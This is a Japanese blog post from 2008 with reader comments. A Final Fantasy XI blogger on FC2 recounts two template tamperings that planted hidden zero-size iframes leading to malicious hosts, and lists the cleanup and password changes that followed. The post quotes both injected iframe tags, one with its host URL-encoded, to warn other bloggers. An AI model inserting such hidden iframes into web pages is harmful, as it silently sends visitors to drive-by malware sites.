テンプレート改竄事件再び。

テンプレート改竄事件再び。 に関する記事です。
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

[RSS]

テンプレ改竄事件の注意喚起をしていたところに
また、当ブログよりウィルスが検知されたという報告を頂き
今回はまる二日近く閉めておりました(´・ω・`)

足を運んでくださっている方に対し申し訳ない気持ちでいっぱいです(´・ω・`)
今回は対策の進んでいる方も多いとは思いますが
今一度自衛手段の確認のほどよろしくお願いします。

事の顛末を詳しくお知らせしておこうと思います。


まず、1度目の騒動
3/3 AM3:00   コメントによりウィルス発見の報告
3/3 AM5:00頃 ブログをプライベートモードに移行して一時クローズ状態に
           FF11 ペット狩り黒猫日記様こちらの記事を発見
          熟読後、テンプレ内をチェック
         <iframe src=http://www■dda3■net width=0 height=0></iframe>
          という怪しいタグを発見、直ちに削除。
          カスペルスキーオ&シマンテックのオンラインチェック実行→感染無し 
          Spybot.Search&Destroy ver1.13にてスパイウェアチェック&削除
3/3 AM7:00頃 FC2のログインパスワードの変更
                           ブログクローズの解除(つまり公開)
          FC2へメールにて報告
          FC2アカウントのログイン状況を調べられないかと問い合わせ
           →アカウントログイン状況は開示できないとの回答
            ⇒開示はしなくていいから調査してくれと返信フォームより返信
             →返事なし(´・ω・`)

この後、何度かPCの方はオンラインスキャンを掛けています。

そして2度目

3/9 14:50 非公開コメントにてウィルス検出の報告。
同   17:00 サンドラさんより同様の報告
  20:00頃 ブログをプライベートモードへ移行
        テンプレ内を検索したところ
        < iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%
          6E%65%74 width=0 height=0>< /iframe>
        というタグを発見。
   そのときのSSがこちら
テンプレ改竄
 ソースURLがエンコードされていて、さらにわかりにくくなってました(´・ω・`)
 これをデコードしてみると www.hellh.net というところで
 前回同様サーバー所在地は香港
 怪しげなインラインフレーム2、スクリプト1という結果でした。
 www.cnzz.com に繋がりがあり、こちらはサーバー所在地中国。
 気になる方はAguseで検索してみてくださいませ。
 hellh.の方は登録日が2008.03.08とか超あたらしい((((゜д゜;))))

FC2の方へ再度メールにて問い合わせを行い、
spybot.S&Dを1.14があったのでこちらにしてスキャンしてみましたが
特にコレといって新しいスパイウェアが発見されるでもなく・・
FC2の方から決定的な回答が得られるわけでもなく、、
抜本的な対策がとれないのでブログの公開を見合わせて居ました。


まず、
1.パスの変更から6日で2度目の改竄があったこと。
2.数多くあるFFブログの中で改竄の被害にあったブログの数が少ないこと
この2点より考えて一番怪しいのはうちのPCが何かに感染してることなんですが・・
色んなソフトで徹底的にチェックしても何も出てこない(´・ω・`)
(SpybotS&Dで最初に削除した物のリストを残しておくのは忘れてしまいました。)
FC2側に何か問題があったとすればもっと多くのサイトに被害が出ているだろう、
と考えるのが普通なので、この数日あちこち調べまわってはいるんですが
これといった決め手になる原因が発見できません。

『もう一つの疑問。なぜパスの変更を行ってこないのか?』
考えられる最悪の事態としては
業者が罠サイトへの誘導インラインフレームを設定した上で、
FC2のパスワードを変更すると、管理者がログインできなくなるので
今回の様に数時間で対策されるということもなく、
より長い時間パス抜きサイトとして使えてしまうわけです。
(この場合、私は即座にアカウントの停止をFC2の方へ連絡して対処しようと思っています)

仮に私のFC2IDとパスワードが漏洩しているとすれば
管理画面からパスワードの変更はカンタンに出来るわけですから。。
そういう事が無いということはやはりパスワードなしで改竄できているのでしょうか(´・ω・`)

セキュリティ関連を見て回ると 
ITproセキュリティ管理者のためのフォーラムということろで以下のような記事を見つけました。
Webページを見ただけでボットに感染
攻撃ツール「MPack」による被害が世界規模で拡大

こちらの記事によると、多くのwebサイトが改竄を受け
その手法は推測の域を出ない情報しかないとのこと。
このような事件があるということは当然FC2に限らず
WEB上の全てのサイトで今回のような改竄がされる可能性があるのですよね・・


FC2の調査の方もぶっちゃけて言えば次に改竄が起きないと判らないみたいですし、
うちの方で出来る対策もコレ以上無い、ということで
非公開にしておく意味が無くなってしまったので一応公開にします。

今回、一応パスワードチェッカーをつかって
「最強」と判定されたパスワードに変更しておきました
しかし、今回抜本的な対策が取れたわけではありません。
この先も改竄が続く場合にはブログの閉鎖も検討しようとおもいます。
webのセキュリティについてはそれなりに気を使っている方だと思いますが
セキュリティやwebについて専門的な知識があるわけではないので、
コレの対策にばかり時間をかけるのは正直しんどいという思いもあります。

うちだけが公開しなければそれで皆様の安全が確保されるわけじゃないんですけどね・・・

今回問題となっている<Iframe>タグについてはイロイロなブログ様でも解説されています。
一番判りやすかった
たるたるアンミラZさんの記事にて
iframeタグ自体を無効化する方法が説明されています。
実は私も1回目の改竄のあと、FireFoxのアドオンを丁度導入したところでした。

別の方法としては
FF11ペット狩り黒猫日記さんのところで紹介されている
Dr.WEBも大変便利です。
FireFox版はアドオンを入れるだけなのでカンタンに設定可能ですに
 

抜本的対策が取れない以上、自衛していただくしかないということです。
iframe無効は不便もありますが、現状ココまで悪用されるとなるとねぇ(´・ω・`)

今回の件で、FC2ブログにはアクセスしない!という方もおられるようです
自衛として業者に目をつけられているところを避けるというのは一つの手かもしれませんが
それだけでは結局のところ自分の勘で避けたところ以外に何かあった場合に
感染を防ぐことが出来るとは限りません。
ネットに接続すること自体がリスクを含んでしまうという悲しい現実ですので
自己責任でご覧頂くようにお願いするほかありません。

今回の件でこちらからのリンクの削除を希望される方はご連絡ください
記事からのリンクも含めてできる限り迅速に対応したいとおもいます。

しばらくはTBPも自粛しましょうかね(´・ω・`)
いやな時代になったものです。


FC2側はパスワードが推測されて管理画面に侵入されたという見解のようですが
はっきりいって最初のパスワードですら覚えるのが困難なぐらいのパスワードで
意味の無い数字とアルファベットの組み合わせだったので
推測によるパス突破はありえません。
2回目のパスワードは10文字を超える物で、数字とアルファベットの組み合わせ
推測とかありえる次元の物ではないということを書き加えておきます。

最後にわたくしの気持ちを代弁してくださる方を呼んでみました


         ,. -‐'''''""¨¨¨ヽ
         (.___,,,... -ァァフ|       あ…ありのまま 今 起こった事を話すぜ!
          |i i|    }! }} //|
         |l、{   j} /,,ィ//|     『おれはパスワードを変更して防衛を完了したと
        i|:!ヾ、_ノ/ u {:}//ヘ         思ったら六日後にはまた改竄されていた。』
        |リ u' }  ,ノ _,!V,ハ |
       /´fト、_{ル{,ィ'eラ , タ人      な… 何を言ってるのか わからねーと思うが
     /'   ヾ|宀| {´,)⌒`/ |<ヽトiゝ       おれも何をされたのかわからなかった
    ,゙  / )ヽ iLレ  u' | | ヾlトハ〉
     |/_/  ハ !ニ⊇ '/:}  V:::::ヽ        頭がどうにかなりそうだった…
    // 二二二7'T'' /u' __ /:::::::/`ヽ
   /'´r -―一ァ‐゙T´ '"´ /::::/-‐  \    超スピードだとか催眠術だとか
   / //   广¨´  /'   /:::::/´ ̄`ヽ ⌒ヽ   そんなチャチなもんじゃあ 断じてねえ
  ノ ' /  ノ:::::`ー-、___/::::://       ヽ  
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::...      もっと恐ろしいものの片鱗を味わったぜ…



CM
アインシュタインの脳・集中力をつけるCD
セキュリティーソフトのトレンドマイクロ・オンラインショップ
人気ブログバーナー
↑オンラインゲームブログランキング参加中

[RSS]

コメント
この記事へのコメント
えええええ!
驚きました。
当方同じFC2でブログをやっている者ですが、まさかそんなことがおきているとは。以前のコメント欄にURL書いてパス抜かれる奴にもほとほと参っていましたが、まさかテンプレ改竄までされるとは!

とてもためになりました。
気をつけます。
2008/03/11(火) 15:46 | URL | ライツ #-[ 編集]
引越しか~。
FC2つかいかってよかったんですけどねー。
ウチも検討しようかなぁ、
2008/03/11(火) 16:02 | URL | しゃむ #JalddpaA[ 編集]
なんか読んでいるとユーザーではなくて
別の所に問題がありそうな感じがしますねぇ(´・ω・`)
お金払うのが苦でなければサーバ借りて
SB使うのが楽と思いますヨ
色々好きなようにいじれますし~
2008/03/11(火) 16:58 | URL | 裏暗 #hRWi1c.Q[ 編集]
>>ライツさま
いらっしゃいませ、どうぞお気をつけくださいませませ。
最近ちょっと騒ぎになっていて
うちのブログ以外でもセキュリティについて詳しく扱っているところが多くありますので
そちらをご覧になるとよりばっちり対策できるかとおもいます。

>>しゃむさま
FC2使い勝手いいんですよねー
テンプレも改変自由にできるし
プラグインも豊富にあるし~
ただ、業者様に目をつけられているのも事実のようで(´・ω・`)
移ったところで業者がずっとFC2だけをターゲットにしていてくれる保障もないですし、
いろいろと難しいところです。

>>裏暗さま
有料サービスになったらそれだけセキュリティは高まるんでしょうかねぇ
自分に知識がないと結局同じだと今の私には無駄かもとか思ってしまいます。
知識もつけていかないといけませんよねぇ(´・ω・`)
気軽に使えるのがブログのいいところだったのに。
2008/03/11(火) 21:29 | URL | R-type #UuvXpI/I[ 編集]
先日伺ったら、見られない設定になっていたので
「何か起きたのか?」と心配していたのですが、大変なことに・・・

R-typeさんがこれだけ対策しても、
何事もなかったように改竄してくると言うのが、とても気味悪いですね。

FC2は「猿まね多すぎ」と揶揄される事もありますが、使い勝手が良いので、
まだ実害を貰っていない立場なのもあり、移転は躊躇してしまいます。
ただ、記事を拝読していて、

FC2の調査の方もぶっちゃけて言えば次に改竄が起きないと判らないみたいですし、

というFC2の対応には正直不信感を抱いています。
(事件が起こらないと動かない警察かt)

今後のFC2の姿勢について把握するのは、
実害を被っているR-typeさんの記事を頼るしかないのですが、
それ次第で移転を視野に入れなければいけないのかと、
考えております。
2008/03/12(水) 01:05 | URL | millis #P3Alq9X.[ 編集]
参考になるか判りませんが
いつも拝見させて頂いております。
一応その方面の仕事をしているので
気になったことを述べます。
R-type様の環境がよくわからないので推測の域を出ませんが、その他のFC2のブログで被害が少ないのであれば、個別的な問題点があると思います。悪意のある人がFC2のサーバをクラックしているというよりも、R-type様のパスワードをなんらかの方法で抜いているような気がします。R-type様がブログを編集する時に、管理画面にログインすると思いますが、暗号化等を行わないプレーンテキストのパスワード認証であれば、途中に流れるパケットさえ読み込めれば簡単にパスワードが抜けます。
ご存知かと思いますが、ある程度の種類の記号を組み合わせ10桁ものパスワードであれば、総当りでパスワードクラックを行っても一般で利用できそうなコンピュータでは時間的に短時間でクラックはできません。
FC2側のサーバのアクセスログでも見れれば何かヒントが掴めると思うのですが、FC2側では提供してもらえないのでしょうか?
少なくともファイル更新時のタイムスタンプぐらいはおかしそうな気がするのですが。
2008/03/12(水) 18:02 | URL | hoge #sqCyeZqA[ 編集]
管理人のみ閲覧できます
このコメントは管理人のみ閲覧できます
2008/03/12(水) 18:07 | | #[ 編集]
>>millisさま
ちょっと書き方が悪かったかもしれませんね。
調べてくれては居るみたいです。
しかし、はっきりとは判らないとの事です。
担当の方の対応がイマイチなのは否定しませんが、全てのスタッフがそうと言うわけではないのでしょうけれどね~
私もFC2は使いやすいと感じているので出来れば引越しはしたくないのですけど。どうしたらいいのかなぁとおもっています。

>>hoge さま
専門的なご意見を頂けてとても助かります。
少しわからない点があります。
1.暗号化というのはSSLを使用しているかどうかといことでしょうか。
2.FC2のログイン画面では一瞬https:の画面を経由するように思いますが、暗号化という意味で十分なのか判断できません。
3.仮に暗号化されていなかった場合にユーザー側で講じるべき対処というのがあるのでしょうか?
4.パケットを途中で読まれているかどうかの判断をこちらですることは可能なのでしょうか?

私もパス変更からあまりにも日数が短い2度目の改竄から考えて
パスの複雑性の問題ではないと思っています。
アクセスログに関しては提供してもらえないそうですが、
改めてメールにて確認してみようとおもいます。

専門的なご意見をありがとうございました。


>>秘密コメントの方
ご意見をありがとうございます。
一応パーソナルファイアウォールを導入して許可していない通信に関してはアラートが出るようになっていますが、これでは不十分でしょうか?
携帯からのパス変更は良いアイデアに思えるので出きるのか調べてみます。
2008/03/13(木) 21:06 | URL | R-type #UuvXpI/I[ 編集]
質問の回答です
1.はい。SSLのことです。
2.一瞬HTTPSになるなら、認証部分だけ
SSL通信をしていると思われます。
このようなシステムな場合、いくつかの問題があるとも言われてますが、何もないよりはいいと思います。
3.最近の傾向として、既に認証されているセッションを利用して改ざんする手法があるそうです。管理画面にログインしてブログの編集中には、タブブラウズや新しくブラウザーを立ち上げて、その他のサイトのブラウジングは控えた方がいいでしょう。この手法の場合は不正な通信でもなくウィルスでもないので、ウィルスチェックカーでは引っ掛からないはずです.
4.途中で見られているかどうかの判断は難しいです。
甘い管理体制のネットワークですと、容易に特定のPCの通信は傍受可能です。
学校、職場、ネットカフェ、無線LAN
で適当な状態ですと、結構簡単に傍受できます。
2008/03/17(月) 02:18 | URL | hoge #sqCyeZqA[ 編集]
>>hoge様
丁寧に回答してくださってありがとうございます。
3.の認証中のセッションを利用というのは恐ろしいですねぇ~
そんなことができると思うと気味が悪くてしかたないです(´・ω・`)
1度目の改竄以降自宅外からの更新も控えているので4.に関しては該当しなさそうです。
誰でも手軽に利用できるというのが売りのブログなので
できれば運営側でちゃんと調査してもれるといいんですけどねぇ~
とりあえず、できる限りの手段を講じてみましたので
また何かありましたら教えてくださいませ。
2008/03/17(月) 14:44 | URL | R-type #UuvXpI/I[ 編集]
管理人のみ閲覧できます
このコメントは管理人のみ閲覧できます
2008/03/28(金) 10:59 | | #[ 編集]
>>秘密コメントの方
ご指摘のリンクに関しては当ブログ開設時よりあるんだと思います。
これはテンプレ作成者の作った物で、テンプレ使用条件にその辺を削除しないことが盛り込まれていたように思いますが正確には記憶していません。
過敏になっておられる方もありますので削除もしくはこの記述のないテンプレートへの変更も検討しておきますが、現在のところ有害な物ではないということをご理解ください。

ご連絡ありがとうございました。
2008/03/28(金) 14:20 | URL | R-type #UuvXpI/I[ 編集]
コメントを投稿する
URL:
Comment:
Pass:
秘密: 管理者にだけ表示を許可する
 
トラックバック
この記事のトラックバックURL
http://ffxiwar.blog91.fc2.com/tb.php/221-62f8a953
この記事にトラックバックする(FC2ブログユーザー)
この記事へのトラックバック
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。